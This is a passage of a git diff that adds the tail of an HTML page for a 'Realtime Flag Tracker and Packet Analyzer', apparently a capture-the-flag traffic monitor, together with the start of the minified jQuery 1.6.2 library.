$.each(data, function(key, val) { + s = '<tr id="flags" class="'+ val[3] +'"><td>'+ val[0] +'</td><td class="direction">'+ val[3].toUpperCase() +'</td><td class="flag"><a href="#/get/'+ val[4] +'/'+ val[1] +'">'+ val[2] +'</a></td><td class="info">'+ convertScapyToHTML(val[5]) +'</td></tr>'; + + if($.inArray(s, loaded_items) == -1) { + loaded_items.unshift(s); + } + + $('<table/>', { + 'class': 'flag-list', + html: loaded_items.join('') + }).htmlTo('div#flags'); + + + $("a[href*='#/get/']").click(function() { + $.getJSON(this.href.split('#')[1], function(data) { + var items = []; + + $.each(data['packets'], function(key, val) { + items.push('<li id="packet">'+convertScapyToHTML(val)+'</li>'); + }); + + $('<ul/>', { + 'class': 'packet-list', + html: items.join('') + }).htmlTo('div#packets'); + + if(data['payload'] == null) { + $('div#packets').css('display', 'inline'); + } + + p = document.getElementById('payload'); + p.innerHTML = '<h2>Stream content:</h1>'+convertScapyToHTML(data['payload']); + + if(data['payload'] != null) { + $('div#payload').css('display', 'inline'); + } else { + $('div#payload').css('display', ' none'); + } + }); + }); + }); + }); + } + + $(document).ready(function() { + // do stuff when DOM is ready + + document.getElementById('flags').innerHTML = '' + updateFlags(); + //setInterval('updateFlags()', 5*1000); + }); + </script> + </head> + <body> + <div id="header"> + <h1>Realtime Flag Tracker and Packet Analyzer</h1> + </div> + + <div id="flags"> + <div>This page requires JavaScript to be enabled for insane fancyness.</div> + </div> + + <div id="packets", style="display: none;"> + No flag selected. + </div> + + <div id="payload", style="display: none;"> + No flag selected. + </div> + </body> +</html> diff --git a/flag-tracker/jquery-1.6.2.min.js b/flag-tracker/jquery-1.6.2.min.js @@ -0,0 +1,18 @@ +/*! + * jQuery JavaScript Library v1.6.2 + * http://jquery.com/ + * + * Copyright 2011, John Resig + * Dual licensed under the MIT or GPL Version 2 licenses. + * http://jquery.org/license + * + * Includes Sizzle.js + * http://sizzlejs.com/ + * Copyright 2011, The Dojo Foundation + * Released under the MIT, BSD, and GPL Licenses. + * + * Date: Thu Jun 30 14:16:56 2011 -0400 + */ +(function(a,b){function cv(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cs(a){if(!cg[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){ch||(ch=c.createElement("iframe"),ch.frameBorder=ch.width=ch.height=0),b.appendChild(ch);if(!ci||!ch.createElement)ci=(ch.contentWindow||ch.contentDocument).document,ci.write((c.compatMode==="CSS1Compat"?"<!doctype html>":"")+"<html><body>"),ci.close();d=ci.createElement(a),ci.body.appendChild(d),e=f.css(d,"display"),b.removeChild(ch)}cg[a]=e}return cg[a]}function cr(a,b){var c={};f.each(cm.concat.apply([],cm.slice(0,b)),function(){c[this]=a});return c}function cq(){cn=b}function cp(){setTimeout(cq,0);return cn=f.now()}function cf(){try{return new a.ActiveXObject("Microsoft.XMLHTTP")}catch(b){}}function ce(){try{return new a.XMLHttpRequest}catch(b){}}function b$(a,c){a.dataFilter&&(c=a.dataFilter(c,a.dataType));var d=a.dataTypes,e={},g,h,i=d.length,j,k=d[0],l,m,n,o,p;for(g=1;g<i;g++){if(g===1)for(h in a.converters)typeof h=="string"&&(e[h.toLowerCase()]=a.converters[h]);l=k,k=d[g];if(k==="*")k=l;else if(l!=="*"&&l!==k){m=l+" "+k,n=e[m]||e["* "+k];if(!n){p=b;for(o in e){j=o.split(" ");if(j[0]===l||j[0]==="*"){p=e[j[1]+" "+k];if(p){o=e[o],o===!0?n=p:p===!0&&(n=o);break}}}}!n&&!p&&f.error("No conversion from "+m.replace(" "," to ")),n!==!0&&(c=n?n(c):p(o(c)))}}return c}function bZ(a,c,d){var e=a.contents,f=a.dataTypes,g=a.responseFields,h,i,j,k;for(i in g)i in d&&(c[g[i]]=d[i]);while(f[0]==="*")f.shift(),h===b&&(h=a.mimeType||c.getResponseHeader("content-type"));if(h)for(i in e)if(e[i]&&e[i].test(h)){f.unshift(i);break}if(f[0]in d)j=f[0];else{for(i in d){if(!f[0]||a.converters[i+" "+f[0]]){j=i;break}k||(k=i)}j=j||k}if(j){j!==f[0]&&f.unshift(j);return d[j]}}function bY(a,b,c,d){if(f.isArray(b))f.each(b,function(b,e){c||bC.test(a)?d(a,e):bY(a+"["+(typeof e=="object"||f.isArray(e)?b:"")+"]",e,c,d)});else if(!c&&b!=null&&typeof b=="object")for(var e in b)bY(a+"["+e+"]",b[e],c,d);else d(a,b)}function bX(a,c,d,e,f,g){f=f||c.dataTypes[0],g=g||{},g[f]=!0;var h=a[f],i=0,j=h?h.length:0,k=a===bR,l;for(;i<j&&(k||!l);i++)l=h[i](c,d,e),typeof l=="string"&&(!k||g[l]?l=b:(c.dataTypes.unshift(l),l=bX(a,c,d,e,l,g)));(k||!l)&&!g["*"]&&(l=bX(a,c,d,e,"*",g));return l}function bW(a){return function(b,c){typeof b!="string"&&(c=b,b="*");if(f.isFunction(c)){var d=b.toLowerCase().split(bN),e=0,g=d.length,h,i,j;for(;e<g;e++)h=d[e],j=/^\+/.test(h),j&&(h=h.substr(1)||"*"),i=a[h]=a[h]||[],i[j?"unshift":"push"](c)}}}function bA(a,b,c){var d=b==="width"?a.offsetWidth:a.offsetHeight,e=b==="width"?bv:bw;if(d>0){c!=="border"&&f.each(e,function(){c||(d-=parseFloat(f.css(a,"padding"+this))||0),c==="margin"?d+=parseFloat(f.css(a,c+this))||0:d-=parseFloat(f.css(a,"border"+this+"Width"))||0});return d+"px"}d=bx(a,b,b);if(d<0||d==null)d=a.style[b]||0;d=parseFloat(d)||0,c&&f.each(e,function(){d+=parseFloat(f.css(a,"padding"+this))||0,c!=="padding"&&(d+=parseFloat(f.css(a,"border"+this+"Width"))||0),c==="margin"&&(d+=parseFloat(f.css(a,c+this))||0)});return d+"px"}function bm(a,b){b.src?f.ajax({url:b.src,async:!1,dataType:"script"}):f.globalEval((b.text||b.textContent||b.innerHTML||"").replace(be,"/*$0*/")),b.parentNode&&b.parentNode.removeChild(b)}function bl(a){f.nodeName(a,"input")?bk(a):"getElementsByTagName"in a&&f.grep(a.getElementsByTagName("input"),bk)}function bk(a){if(a.type==="checkbox"||a.type==="radio")a.defaultChecked=a.checked}function bj(a){return"getElementsByTagName"in a?a.getElementsByTagName("*"):"querySelectorAll"in a?a.querySelectorAll("*"):[]}function bi(a,b){var c;if(b.nodeType===1){b.clearAttributes&&b.clearAttributes(),b.mergeAttributes&&b.mergeAttributes(a),c=b.nodeName.toLowerCase();if(c==="object")b.outerHTML=a.outerHTML;else if(c!=="input"||a.type!=="checkbox"&&a.type!=="radio"){if(c==="option")b.selected=a.defaultSelected;else if(c==="input"||c==="textarea")b.defaultValue=a.defaultValue}else a.checked&&(b.defaultChecked=b.checked=a.checked),b.value!==a.value&&(b.value=a.value);b.removeAttribute(f.expando)}}function bh(a,b){if(b.nodeType===1&&!!f.hasData(a)){var c=f.expando,d=f.data(a),e=f.data(b,d);if(d=d[c]){var g=d.events;e=e[c]=f.extend({},d);if(g){delete e.handle,e.events={};for(var h in g)for(var i=0,j=g[h].length;i<j;i++)f.event.add(b,h+(g[h][i].namespace?".":"")+g[h][i].namespace,g[h][i],g[h][i].data)}}}}function bg(a,b){return f.nodeName(a,"table")?a.getElementsByTagName("tbody")[0]||a.appendChild(a.ownerDocument.createElement("tbody")):a}function W(a,b,c){b=b||0;if(f.isFunction(b))return f.grep(a,function(a,d){var e=!!b.call(a,d,a);return e===c});if(b.nodeType)return f.grep(a,function(a,d){return a===b===c});if(typeof b=="string"){var d=f.grep(a,function(a){return a.nodeType===1});if(R.test(b))return f.filter(b,d,!c);b=f.filter(b,d)}return f.grep(a,function(a,d){return f.inArray(a,b)>=0===c})}function V(a){return!a||!a.parentNode||a.parentNode.nodeType===11}function N(a,b){return(a&&a!=="*"?a+".":"")+b.replace(z,"`").replace(A,"&")}function M(a){var b,c,d,e,g,h,i,j,k,l,m,n,o,p=[],q=[],r=f._data(this,"events");if(!(a.liveFired===this||!r||!r.live||a.target.disabled||a.button&&a.type==="click")){a.namespace&&(n=new RegExp("(^|\\.)"+a.namespace.split(".").join("\\.(?:.*\\.)?")+"(\\.|$)")),a.liveFired=this;var s=r.live.slice(0);for(i=0;i<s.length;i++)g=s[i],g.origType.replace(x,"")===a.type?q.push(g.selector):s.splice(i--,1);e=f(a.target).closest(q,a.currentTarget);for(j=0,k=e.length;j<k;j++){m=e[j];for(i=0;i<s.length;i++){g=s[i];if(m.selector===g.selector&&(!n||n.test(g.namespace))&&!m.elem.disabled){h=m.elem,d=null;if(g.preType==="mouseenter"||g.preType==="mouseleave")a.type=g.preType,d=f(a.relatedTarget).closest(g.selector)[0],d&&f.contains(h,d)&&(d=h);(!d||d!==h)&&p.push({elem:h,handleObj:g,level:m.level})}}}for(j=0,k=p.length;j<k;j++){e=p[j];if(c&&e.level>c)break;a.currentTarget=e.elem,a.data=e.handleObj.data,a.handleObj=e.handleObj,o=e.handleObj.origHandler.apply(e.elem,arguments);if(o===!1||a.isPropagationStopped()){c=e.level,o===!1&&(b=!1);if(a.isImmediatePropagationStopped())break}}return b}}function K(a,c,d){var e=f.extend({},d[0]);e.type=a,e.originalEvent={},e.liveFired=b,f.event.handle.call(c,e),e.isDefaultPrevented()&&d[0].preventDefault()}function E(){return!0}function D(){return!1}function m(a,c,d){var e=c+"defer",g=c+"queue",h=c+"mark",i=f.data(a,e,b,!0);i&&(d==="queue"||!f.data(a,g,b,!0))&&(d==="mark"||!f.data(a,h,b,!0))&&setTimeout(function(){!f.data(a,g,b,!0)&&!f.data(a,h,b,!0)&&(f.removeData(a,e,!0),i.resolve())},0)}function l(a){for(var b in a)if(b!=="toJSON")return!1;return!0}function k(a,c,d){if(d===b&&a.nodeType===1){var e="data-"+c.replace(j,"$1-$2").toLowerCase();d=a.getAttribute(e);if(typeof d=="string"){try{d=d==="true"?!0:d==="false"?!1:d==="null"?null:f.isNaN(d)?i.test(d)?f.parseJSON(d):d:parseFloat(d)}catch(g){}f.data(a,c,d)}else d=b}return d}var c=a.document,d=a.navigator,e=a.location,f=function(){function J(){if(!e.isReady){try{c.documentElement.doScroll("left")}catch(a){setTimeout(J,1);return}e.ready()}}var e=function(a,b){return new e.fn.init(a,b,h)},f=a.jQuery,g=a.$,h,i=/^(?:[^<]*(<[\w\W]+>)[^>]*$|#([\w\-]*)$)/,j=/\S/,k=/^\s+/,l=/\s+$/,m=/\d/,n=/^<(\w+)\s*\/?>(?:<\/\1>)?$/,o=/^[\],:{}\s]*$/,p=/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g,q=/"[^"\\\n\r]*"|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?/g,r=/(?:^|:|,)(?:\s*\[)+/g,s=/(webkit)[ \/]([\w.]+)/,t=/(opera)(?:.*version)?[ \/]([\w.]+)/,u=/(msie) ([\w.]+)/,v=/(mozilla)(?:.*? rv:([\w.]+))?/,w=/-([a-z])/ig,x=function(a,b){return b.toUpperCase()},y=d.userAgent,z,A,B,C=Object.prototype.toString,D=Object.prototype.hasOwnProperty,E=Array.prototype.push,F=Array.prototype.slice,G=String.prototype.trim,H=Array.prototype.indexOf,I={};e.fn=e.prototype={constructor:e,init:function(a,d,f){var g,h,j,k;if(!a)return this;if(a.nodeType){this.context=this[0]=a,this.length=1;return this}if(a==="body"&&!d&&c.body){this.context=c,this[0]=c.body,this.selector=a,this.length=1;return this}if(typeof a=="string"){a.charAt(0)!=="<"||a.charAt(a.length-1)!==">"||a.length<3?g=i.exec(a):g=[null,a,null];if(g&&(g[1]||!d)){if(g[1]){d=d instanceof e?d[0]:d,k=d?d.ownerDocument||d:c,j=n.exec(a),j?e.isPlainObject(d)?(a=[c.createElement(j[1])],e.fn.attr.call(a,d,!0)):a=[k.createElement(j[1])]:(j=e.buildFragment([g[1]],[k]),a=(j.cacheable?e.clone(j.fragment):j.fragment).childNodes);return e.merge(this,a)}h=c.getElementById(g[2]);if(h&&h.parentNode){if(h.id!==g[2])return f.find(a);this.length=1,this[0]=h}this.context=c,this.selector=a;return this}return!d||d.jquery?(d||f).find(a):this.constructor(d).find(a)}if(e.isFunction(a))return f.ready(a);a.selector!==b&&(this.selector=a.selector,this.context=a.context);return e.makeArray(a,this)},selector:"",jquery:"1.6.2",length:0,size:function(){return this.length},toArray:function(){return F.call(this,0)},get:function(a){return a==null?this.toArray():a<0?this[this.length+a]:this[a]},pushStack:function(a,b,c){var d=this.constructor();e.isArray(a)?E.apply(d,a):e.merge(d,a),d.prevObject=this,d.context=this.context,b==="find"?d.selector=this.selector+(this.selector?" ":"")+c:b&&(d.selector=this.selector+"."+b+"("+c+")");return d},each:function(a,b){return e.each(this,a,b)},ready:function(a){e.bindReady(),A.done(a);return this},eq:function(a){return a===-1?this.slice(a):this.slice(a,+a+1)},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},slice:function(){return this.pushStack(F.apply(this,arguments),"slice",F.call(arguments).join(","))},map:function(a){return this.pushStack(e.map(this,function(b,c){return a.call(b,c,b)}))},end:function(){return this.prevObject||this.constructor(null)},push:E,sort:[].sort,splice:[].splice},e.fn.init.prototype=e.fn,e.extend=e.fn.extend=function(){var a,c,d,f,g,h,i=arguments[0]||{},j=1,k=arguments.length,l=!1;typeof i=="boolean"&&(l=i,i=arguments[1]||{},j=2),typeof i!="object"&&!e.isFunction(i)&&(i={}),k===j&&(i=this,--j);for(;j<k;j++)if((a=arguments[j])!=null)for(c in a){d=i[c],f=a[c];if(i===f)continue;l&&f&&(e.isPlainObject(f)||(g=e.isArray(f)))?(g?(g=!1,h=d&&e.isArray(d)?d:[]):h=d&&e.isPlainObject(d)?d:{},i[c]=e.extend(l,h,f)):f!==b&&(i[c]=f)}return i},e.extend({noConflict:function(b){a.$===e&&(a.$=g),b&&a.jQuery===e&&(a.jQuery=f);return e},isReady:!1,readyWait:1,holdReady:function(a){a?e.readyWait++:e.ready(!0)},ready:function(a){if(a===!0&&!--e.readyWait||a!==!0&&!e.isReady){if(!c.body)return setTimeout(e.ready,1);e.isReady=!0;if(a!==!0&&--e.readyWait>0)return;A.resolveWith(c,[e]),e.fn.trigger&&e(c).trigger("ready").unbind("ready")}},bindReady:function(){if(!A){A=e._Deferred();if(c.readyState==="complete")return setTimeout(e.ready,1);if(c.addEventListener)c.addEventListener("DOMContentLoaded",B,!1),a.addEventListener("load",e.ready,!1);else if(c.attachEvent){c.attachEvent("onreadystatechange",B),a.attachEvent("onload",e.ready);var b=!1;try{b=a.frameElement==null}catch(d){}c.documentElement.doScroll&&b&&J()}}},isFunction:function(a){return e.type(a)==="function"},isArray:Array.isArray||function(a){return e.type(a)==="array"},isWindow:function(a){return a&&typeof a=="object"&&"setInterval"in a},isNaN:function(a){return a==null||!m.test(a)||isNaN(a)},type:function(a){return a==null?String(a):I[C.call(a)]||"object"},isPlainObject:function(a){if(!a||e.type(a)!=="object"||a.nodeType||e.isWindow(a))return!1;if(a.constructor&&!D.call(a,"constructor")&&!D.call(a.constructor.prototype,"isPrototypeOf"))return!1;var c;for(c in a);return c===b||D.call(a,c)},isEmptyObject:function(a){for(var b in a)return!1;return!0},error:function(a){throw a},parseJSON:function(b){if(typeof b!="string"||!b)return null;b=e.trim(b);if(a.JSON&&a.JSON.parse)return a.JSON.parse(b);if(o.test(b.replace(p,"@").replace(q,"]").replace(r,"")))return(new Function("return "+b))();e.error("Invalid JSON: "+b)},parseXML:function(b,c,d){a.DOMParser?(d=new DOMParser,c=d.parseFromString(b,"text/xml")):(c=new ActiveXObject("Microsoft.XMLDOM"),c.async="false",c.loadXML(b)),d=c.documentElement,(!d||!d.nodeName||d.nodeName==="parsererror")&&e.error("Invalid XML: "+b);return c},noop:function(){},globalEval:function(b){b&&j.test(b)&&(a.execScript||function(b){a.eval.call(a,b)})(b)},camelCase:function(a){return a.replace(w,x)},nodeName:function(a,b){return a.nodeName&&a.nodeName.toUpperCase()===b.toUpperCase()},each:function(a,c,d){var f,g=0,h=a.length,i=h===b||e.isFunction(a);if(d){if(i){for(f in a)if(c.apply(a[f],d)===!1)break}else for(;g<h;)if(c.apply(a[g++],d)===!1)break}else if(i){for(f in a)if(c.call(a[f],f,a[f])===!1)break}else for(;g<h;)if(c.call(a[g],g,a[g++])===!1)break;return a},trim:G?function(a){return a==null?"":G.call(a)}:function(a){return a==null?"":(a+"").replace(k,"").replace(l,"")},makeArray:function(a,b){var c=b||[];if(a!=null){var d=e.type(a);a.length==null||d==="string"||d==="function"||d==="regexp"||e.isWindow(a)?E.call(c,a):e.merge(c,a)}return c},inArray:function(a,b){if(H)return H.call(b,a);for(var c=0,d=b.length;c<d;c++)if(b[c]===a)return c;return-1},merge:function(a,c){var d=a.length,e=0;if(typeof c.length=="number")for(var f=c.length;e<f;e++)a[d++]=c[e];else while(c[e]!==b)a[d++]=c[e++];a.length=d;return a},grep:function(a,b,c){var d=[],e;c=!!c;for(var f=0,g=a.length;f<g;f++)e=!!b(a[f],f),c!==e&&d.push(a[f]);return d},map:function(a,c,d){var f,g,h=[],i=0,j=a.length,k=a instanceof e||j!==b&&typeof j=="number"&&(j>0&&a[0]&&a[j-1]||j===0||e.isArray(a));if(k)for(;i<j;i++)f=c(a[i],i,d),f!=null&&(h[h.length]=f);else for(g in a)f=c(a[g],g,d),f!=null&&(h[h.length]=f);return h.concat.apply([],h)},guid:1,proxy:function(a,c){if(typeof c=="string"){var d=a[c];c=a,a=d}if(!e.isFunction(a))return b;var f=F.call(arguments,2),g=function(){return a.apply(c,f.concat(F.call(arguments)))};g.guid=a.guid=a.guid||g.guid||e.guid++;return g},access:function(a,c,d,f,g,h){var i=a.length;if(typeof c=="object"){for(var j in c)e.access(a,j,c[j],f,g,d);return a}if(d!==b){f=!h&&f&&e.isFunction(d);for(var k=0;k<i;k++)g(a[k],c,f?d.call(a[k],k,g(a[k],c)):d,h);return a}return i?g(a[0],c):b},now:function(){return(new Date).getTime()},uaMatch:function(a){a=a.toLowerCase();var b=s.exec(a)||t.exec(a)||u.exec(a)||a.indexOf("compatible")<0&&v.exec(a)||[];return{browser:b[1]||"",version:b[2]||"0"}},sub:function(){function a(b,c){return new a.fn.init(b,c)}e.extend(!0,a,this),a.superclass=this,a.fn=a.prototype=this(),a.fn.constructor=a,a.sub=this.sub,a.fn.init=function(d,f){f&&f instanceof e&&!(f instanceof a)&&(f=a(f));return e.fn.init.call(this,d,f,b)},a.fn.init.prototype=a.fn;var b=a(c);return a},browser:{}}),e.each("Boolean Number String Function Array Date RegExp Object".split(" "),function(a,b){I["[object "+b+"]"]=b.toLowerCase()}),z=e.uaMatch(y),z.browser&&(e.browser[z.browser]=!0,e.browser.version=z.version),e.browser.webkit&&(e.browser.safari=!0),j.test(" ")&&(k=/^[\s\xA0]+/,l=/[\s\xA0]+$/),h=e(c),c.addEventListener?B=function(){c.removeEventListener("DOMContentLoaded",B,!1),e.ready()}:c.attachEvent&&(B=function(){c.readyState==="complete"&&(c.detachEvent("onreadystatechange",B),e.ready())});return e}(),g="done fail isResolved isRejected promise then always pipe".split(" "),h=[].slice;f.extend({_Deferred:function(){var a=[],b,c,d,e={done:function(){if(!d){var c=arguments,g,h,i,j,k;b&&(k=b,b=0);for(g=0,h=c.length;g<h;g++)i=c[g],j=f.type(i),j==="array"?e.done.apply(e,i):j==="function"&&a.push(i);k&&e.resolveWith(k[0],k[1])}return this},resolveWith:function(e,f){if(!d&&!b&&!c){f=f||[],c=1;try{while(a[0])a.shift().apply(e,f)}finally{b=[e,f],c=0}}return this},resolve:function(){e.resolveWith(this,arguments);return this},isResolved:function(){return!!c||!!b},cancel:function(){d=1,a=[];return this}};return e},Deferred:function(a){var b=f._Deferred(),c=f._Deferred(),d;f.extend(b,{then:function(a,c){b.done(a).fail(c);return this},always:function(){return b.done.apply(b,arguments).fail.apply(this,arguments)},fail:c.done,rejectWith:c.resolveWith,reject:c.resolve,isRejected:c.isResolved,pipe:function(a,c){return f.Deferred(function(d){f.each({done:[a,"resolve"],fail:[c,"reject"]},function(a,c){var e=c[0],g=c[1],h;f.isFunction(e)?b[a](function(){h=e.apply(this,arguments),h&&f.isFunction(h.promise)?h.promise().then(d.resolve,d.reject):d[g](h)}):b[a](d[g])})}).promise()},promise:function(a){if(a==null){if(d)return d;d=a={}}var c=g.length;while(c--)a[g[c]]=b[g[c]];return a}}),b.done(c.cancel).fail(b.cancel),delete b.cancel,a&&a.call(b,b);return b},when:function(a){function i(a){return function(c){b[a]=arguments.length>1?h.call(arguments,0):c,--e||g.resolveWith(g,h.call(b,0))}}var b=arguments,c=0,d=b.length,e=d,g=d<=1&&a&&f.isFunction(a.promise)?a:f.Deferred();if(d>1){for(;c<d;c++)b[c]&&f.isFunction(b[c].promise)?b[c].promise().then(i(c),g.reject):--e;e||g.resolveWith(g,b)}else g!==a&&g.resolveWith(g,d?[a]:[]);return g.promise()}}),f.support=function(){var a=c.createElement("div"),b=c.documentElement,d,e,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u;a.setAttribute("className","t"),a.innerHTML=" <link/><table></table><a href='/a' style='top:1px;float:left;opacity:.55;'>a</a><input type='checkbox'/>",d=a.getElementsByTagName("*"),e=a.getElementsByTagName("a")[0];if(!d||!d.length||!e)return{};g=c.createElement("select"),h=g.appendChild(c.createElement("option")),i=a.getElementsByTagName("input")[0],k={leadingWhitespace:a.firstChild.nodeType===3,tbody:!a.getElementsByTagName("tbody").length,htmlSerialize:!!a.getElementsByTagName("link").length,style:/top/.test(e.getAttribute("style")),hrefNormalized:e.getAttribute("href")==="/a",opacity:/^0.55$/.test(e.style.opacity),cssFloat:!!e.style.cssFloat,checkOn:i.value==="on",optSelected:h.selected,getSetAttribute:a.className!=="t",submitBubbles:!0,changeBubbles:!0,focusinBubbles:!1,deleteExpando:!0,noCloneEvent:!0,inlineBlockNeedsLayout:!1,shrinkWrapBlocks:!1,reliableMarginRight:!0},i.checked=!0,k.noCloneChecked=i.cloneNode(!0).checked,g.disabled=!0,k.optDisabled=!h.disabled;try{delete a.test}catch(v){k.deleteExpando=!1}!a.addEventListener&&a.attachEvent&&a.fireEvent&&(a.attachEvent("onclick",function(){k.noCloneEvent=!1}),a.cloneNode(!0).fireEvent("onclick")),i=c.createElement("input"),i.value="t",i.setAttribute("type","radio"),k.radioValue=i.value==="t",i.setAttribute("checked","checked"),a.appendChild(i),l=c.createDocumentFragment(),l.appendChild(a.firstChild),k.checkClone=l.cloneNode(!0).cloneNode(!0).lastChild.checked,a.innerHTML="",a.style.width=a.style.paddingLeft="1px",m=c.getElementsByTagName("body")[0],o=c.createElement(m?"div":"body"),p={visibility:"hidden",width:0,height:0,border:0,margin:0},m&&f.extend(p,{position:"absolute",left:-1e3,top:-1e3});for(t in p)o.style[t]=p[t];o.appendChild(a),n=m||b,n.insertBefore(o,n.firstChild),k.appendChecked=i.checked,k.boxModel=a.offsetWidth===2,"zoom"in a.style&&(a.style.display="inline",a.style.zoom=1,k.inlineBlockNeedsLayout=a.offsetWidth===2,a.style.display="",a.innerHTML="<div style='width:4px;'></div>",k.shrinkWrapBlocks=a.offsetWidth!==2),a.innerHTML="<table><tr><td style='padding:0;border:0;display:none'></td><td>t</td></tr></table>",q=a.getElementsByTagName("td"),u=q[0].offsetHeight===0,q[0].style.display="",q[1].style.display="none",k.reliableHiddenOffsets=u&&q[0].offsetHeight===0,a.innerHTML="",c.defaultView&&c.defaultView.getComputedStyle&&(j=c.createElement("div"),j.style.width="0",j.style.marginRight="0",a.appendChild(j),k.reliableMarginRight=(parseInt((c.defaultView.getComputedStyle(j,null)||{marginRight:0}).marginRight,10)||0)===0),o.innerHTML="",n.removeChild(o);if(a.attachEvent)for(t in{submit:1,change:1,focusin:1})s="on"+t,u=s in a,u||(a.setAttribute(s,"return;"),u=typeof a[s]=="function"),k[t+"Bubbles"]=u;o=l=g=h=m=j=a=i=null;return k}(),f.boxModel=f.support.boxModel;var i=/^(?:\{.*\}|\[.*\])$/,j=/([a-z])([A-Z])/g;f.extend({cache:{},uuid:0,expando:"jQuery"+(f.fn.jquery+Math.random()).replace(/\D/g,""),noData:{embed:!0,object:"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000",applet:!0},hasData:function(a){a=a.nodeType?f.cache[a[f.expando]]:a[f.expando];return!!a&&!l(a)},data:function(a,c,d,e){if(!!f.acceptData(a)){var g=f.expando,h=typeof c=="string",i,j=a.nodeType,k=j?f.cache:a,l=j?a[f.expando]:a[f.expando]&&f.expando;if((!l||e&&l&&!k[l][g])&&h&&d===b)return;l||(j?a[f.expando]=l=++f.uuid:l=f.expando),k[l]||(k[l]={},j||(k[l].toJSON=f.noop));if(typeof c=="object"||typeof c=="function")e?k[l][g]=f.extend(k[l][g],c):k[l]=f.extend(k[l],c);i=k[l],e&&(i[g]||(i[g]={}),i=i[g]),d!==b&&(i[f.camelCase(c)]=d);if(c==="events"&&!i[c])return i[g]&&i[g].events;return h?i[f.camelCase(c)]||i[c]:i}},removeData:function(b,c,d){if(!!f.acceptData(b)){var e=f.expando,g=b.nodeType,h=g?f.cache:b,i=g?b[f.expando]:f.expando;if(!h[i])return;if(c){var j=d?h[i][e]:h[i];if(j){delete j[c];if(!l(j))return}}if(d){delete h[i][e];if(!l(h[i]))return}var k=h[i][e];f.support.deleteExpando||h!=a?delete h[i]:h[i]=null,k?(h[i]={},g||(h[i].toJSON=f.noop),h[i][e]=k):g&&(f.support.deleteExpando?delete b[f.expando]:b.removeAttribute?b.removeAttribute(f.expando):b[f.expando]=null)}},_data:function(a,b,c){return f.data(a,b,c,!0)},acceptData:function(a){if(a.nodeName){var b=f.noData[a.nodeName.toLowerCase()];if(b)return b!==!0&&a.getAttribute("classid")===b}return!0}}),f.fn.extend({data:function(a,c){var d=null;if(typeof a=="undefined"){if(this.length){d=f.data(this[0]);if(this[0].nodeType===1){var e=this[0].attributes,g;for(var h=0,i=e.length;h<i;h++)g=e[h].name,g.indexOf("data-")===0&&(g=f.camelCase(g.substring(5)),k(this[0],g,d[g]))}}return d}if(typeof a=="object")return this.each(function(){f.data(this,a)});var j=a.split(".");j[1]=j[1]?"."+j[1]:"";if(c===b){d=this.triggerHandler("getData"+j[1]+"!",[j[0]]),d===b&&this.length&&(d=f.data(this[0],a),d=k(this[0],a,d));return d===b&&j[1]?this.data(j[0]):d}return this.each(function(){var b=f(this),d=[j[0],c];b.triggerHandler("setData"+j[1]+"!",d),f.data(this,a,c),b.triggerHandler("changeData"+j[1]+"!",d)})},removeData:function(a){return this.each(function(){f.removeData(this,a)})}}),f.extend({_mark:function(a,c){a&&(c=(c||"fx")+"mark",f.data(a,c,(f.data(a,c,b,!0)||0)+1,!0))},_unmark:function(a,c,d){a!==!0&&(d=c,c=a,a=!1);if(c){d=d||"fx";var e=d+"mark",g=a?0:(f.data(c,e,b,!0)||1)-1;g?f.data(c,e,g,!0):(f.removeData(c,e,!0),m(c,d,"mark"))}},queue:function(a,c,d){if(a){c=(c||"fx")+"queue";var e=f.data(a,c,b,!0);d&&(!e||f.isArray(d)?e=f.data(a,c,f.makeArray(d),!0):e.push(d));return e||[]}},dequeue:function(a,b){b=b||"fx";var c=f.queue(a,b),d=c.shift(),e;d==="inprogress"&&(d=c.shift()),d&&(b==="fx"&&c.unshift("inprogress"),d.call(a,function(){f.dequeue(a,b)})),c.length||(f.removeData(a,b+"queue",!0),m(a,b,"queue"))}}),f.fn.extend({queue:function(a,c){typeof a!="string"&&(c=a,a="fx");if(c===b)return f.queue(this[0],a);return this.each(function(){var b=f.queue(this,a,c);a==="fx"&&b[0]!=="inprogress"&&f.dequeue(this,a)})},dequeue:function(a){return this.each(function(){f.dequeue(this,a)})},delay:function(a,b){a=f.fx?f.fx.speeds[a]||a:a,b=b||"fx";return this.queue(b,function(){var c=this;setTimeout(function(){f.dequeue(c,b)},a)})},clearQueue:function(a){return this.queue(a||"fx",[])},promise:function(a,c){function m(){--h||d.resolveWith(e,[e])}typeof a!="string"&&(c=a,a=b),a=a||"fx";var d=f.Deferred(),e=this,g=e.length,h=1,i=a+"defer",j=a+"queue",k=a+"mark",l;while(g--)if(l=f.data(e[g],i,b,!0)||(f.data(e[g],j,b,!0)||f.data(e[g],k,b,!0))&&f.data(e[g],i,f._Deferred(),!0))h++,l.done(m);m();return d.promise()}});var n=/[\n\t\r]/g,o=/\s+/,p=/\r/g,q=/^(?:button|input)$/i,r=/^(?:button|input|object|select|textarea)$/i,s=/^a(?:rea)?$/i,t=/^(?:autofocus|autoplay|async|checked|controls|defer|disabled|hidden|loop|multiple|open|readonly|required|scoped|selected)$/i,u=/\:|^on/,v,w;f.fn.extend({attr:function(a,b){return f.access(this,a,b,!0,f.attr)},removeAttr:function(a){return this.each(function(){f.removeAttr(this,a)})},prop:function(a,b){return f.access(this,a,b,!0,f.prop)},removeProp:function(a){a=f.propFix[a]||a;return this.each(function(){try{this[a]=b,delete this[a]}catch(c){}})},addClass:function(a){var b,c,d,e,g,h,i;if(f.isFunction(a))return this.each(function(b){f(this).addClass(a.call(this,b,this.className))});if(a&&typeof a=="string"){b=a.split(o);for(c=0,d=this.length;c<d;c++){e=this[c];if(e.nodeType===1)if(!e.className&&b.length===1)e.className=a;else{g=" "+e.className+" ";for(h=0,i=b.length;h<i;h++)~g.indexOf(" "+b[h]+" ")||(g+=b[h]+" ");e.className=f.trim(g)}}}return this},removeClass:function(a){var c,d,e,g,h,i,j;if(f.isFunction(a))return this.each(function(b){f(this).removeClass(a.call(this,b,this.className))});if(a&&typeof a=="string"||a===b){c=(a||"").split(o);for(d=0,e=this.length;d<e;d++){g=this[d];if(g.nodeType===1&&g.className)if(a){h=(" "+g.className+" ").replace(n," 